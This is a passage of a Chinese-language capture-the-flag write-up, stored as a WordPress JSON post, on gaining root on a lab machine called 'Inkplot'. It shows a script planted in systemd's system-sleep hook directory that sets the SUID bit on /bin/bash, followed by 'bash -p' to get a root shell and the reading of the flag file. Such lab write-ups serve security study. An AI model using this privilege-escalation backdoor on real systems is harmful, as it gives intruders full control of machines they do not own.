\u5f53\u7cfb\u7edf\u51c6\u5907\u8fdb\u5165\u7761\u7720\u72b6\u6001\u65f6\uff0csystemd<\/code> \u4f1a\u8fd0\u884c\u6b64\u76ee\u5f55\u4e0b\u6240\u6709\u4ee5 .needs<\/code> \u6216 .wants<\/code> \u7ed3\u5c3e\u7684\u811a\u672c\uff0c\u5e76\u4f20\u9012\u4e00\u4e2a\u53c2\u6570\uff0c\u6307\u793a\u7cfb\u7edf\u5373\u5c06\u8fdb\u5165\u54ea\u79cd\u7761\u7720\u72b6\u6001\uff08\u4f8b\u5982 suspend<\/code>\u3001hibernate<\/code> \u6216 hybrid-sleep<\/code>\uff09\u3002\u540c\u6837\uff0c\u5f53\u7cfb\u7edf\u4ece\u7761\u7720\u72b6\u6001\u5524\u9192\u65f6\uff0c\u4e5f\u4f1a\u8fd0\u884c\u76f8\u5e94\u7684\u811a\u672c\u3002<\/p>\n
\u8fd9\u4e9b\u811a\u672c\u901a\u5e38\u7528\u4e8e\u6267\u884c\u4e00\u4e9b\u5728\u7cfb\u7edf\u7761\u7720\u6216\u5524\u9192\u65f6\u9700\u8981\u8fdb\u884c\u7684\u7279\u6b8a\u64cd\u4f5c\uff0c\u4f8b\u5982\uff1a<\/p>\n
    \n
  • \u4fdd\u5b58\u6216\u6062\u590d\u67d0\u4e9b\u786c\u4ef6\u72b6\u6001\u3002<\/li>\n
  • \u505c\u6b62\u6216\u91cd\u542f\u67d0\u4e9b\u670d\u52a1\u3002<\/li>\n
  • \u66f4\u65b0\u6216\u6e05\u7406\u7f13\u5b58\u3002<\/li>\n
  • \u6267\u884c\u4e00\u4e9b\u81ea\u5b9a\u4e49\u7684\u64cd\u4f5c\u3002<\/li>\n<\/ul>\n<\/blockquote>\n
    \u5199\u4e00\u4e2a\u6587\u4ef6\u5230\u8fd9\u91cc\u9762\u53bb\uff1a<\/p>\n
    \u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ cd \/usr\/lib\/systemd\/system-sleep                                                                                                                1 \u21b5\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ echo '#!\/bin\/bash' > payload\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ echo 'chmod +s \/bin\/bash' >> payload\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ cat payload                      \n#!\/bin\/bash\nchmod +s \/bin\/bash\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash<\/code><\/pre>\n
    \u7136\u540e\u4e0d\u52a8\uff0c\u7b49\u5f85\u7cfb\u7edf\u9501\u6b7b\uff1a<\/p>\n
    \"image-20240422145654444\"<\/div><\/p>\n
    \u91cd\u542f\u9776\u673a\uff1a<\/p>\n
    \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ ssh pauline@192.168.0.147 -i inkplot \nAuto-standby now activated after 2 min of inactivity\nLinux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Apr 22 08:51:04 2024 from 192.168.0.143\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash<\/code><\/pre>\n
    \u6ca1\u6210\u529f\uff1f\u5c1d\u8bd5\u6dfb\u52a0\u4e00\u4e2a\u6267\u884c\u6743\u9650\uff0c\u518d\u6765\u4e00\u6b21\uff1a<\/p>\n
    \u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ cd \/usr\/lib\/systemd\/system-sleep\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ ls             \npayload\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ cat payload                     \n#!\/bin\/bash\nchmod +s \/bin\/bash\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ chmod +x payload\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ ls -la         \ntotal 20\ndrwxrwx---  2 root    admin    4096 Apr 22 08:52 .\ndrwxr-xr-x 14 root    root    12288 Jul 28  2023 ..\n-rwxr-xr-x  1 pauline pauline    31 Apr 22 08:52 payload<\/code><\/pre>\n
    \u62ff\u4e0broot!<\/p>\n
    \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ ssh pauline@192.168.0.147 -i inkplot \nAuto-standby now activated after 2 min of inactivity\nLinux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Apr 22 08:57:55 2024 from 192.168.0.143\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ bash -p\nbash-5.2# cd \/root\nbash-5.2# ls -la\ntotal 52\ndrwx------  6 root root 4096 Aug  3  2023 .\ndrwxr-xr-x 18 root root 4096 Jul 27  2023 ..\nlrwxrwxrwx  1 root root    9 Jun 15  2023 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root  571 Jul 22  2023 .bashrc\n-rw-------  1 root root   20 Aug  1  2023 .lesshst\ndrwxr-xr-x  3 root root 4096 Aug  1  2023 .local\ndrwxr-xr-x  4 root root 4096 Jul 26  2023 .npm\ndrwxr-xr-x 12 root root 4096 Jul 22  2023 .oh-my-zsh\n-rw-r--r--  1 root root  161 Jul 22  2023 .profile\n-rwx------  1 root root   33 Aug  1  2023 root.txt\n-rw-r--r--  1 root root   66 Jul 22  2023 .selected_editor\ndrwx------  2 root root 4096 Jul 25  2023 .ssh\n-rw-r--r--  1 root root  165 Jul 26  2023 .wget-hsts\nlrwxrwxrwx  1 root root    9 Jul 22  2023 .zsh_history -> \/dev\/null\n-rw-r--r--  1 root root 3890 Jul 22  2023 .zshrc\nbash-5.2# cat root.txt \n4d9089c262be4a03e3ebfdaff0a8f7c6\nbash-5.2# cd .local\/\nbash-5.2# ls -la\ntotal 16\ndrwxr-xr-x 3 root root 4096 Aug  1  2023 .\ndrwx------ 6 root root 4096 Aug  3  2023 ..\ndrwx------ 3 root root 4096 Jul 22  2023 share\n-rwxr-xr-x 1 root root  218 Aug  1  2023 suspend.sh\nbash-5.2# cat suspend.sh \n#!\/bin\/bash\n\nwhile true ; do\n  TIME=$(w -o |grep "pauline" | awk '{print $5}')\n  if [[ $TIME != "-zsh" ]] ; then\n    TIME=${TIME%%:*}\n    if [[ $TIME -gt 1 ]] ; then\n      systemctl suspend\n    fi\n  fi\n  sleep 5\ndone<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
    Inkplot \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.147 — -A Open  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-604","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/604","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=604"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/604\/revisions"}],"predecessor-version":[{"id":605,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/604\/revisions\/605"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=604"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=604"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=604"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}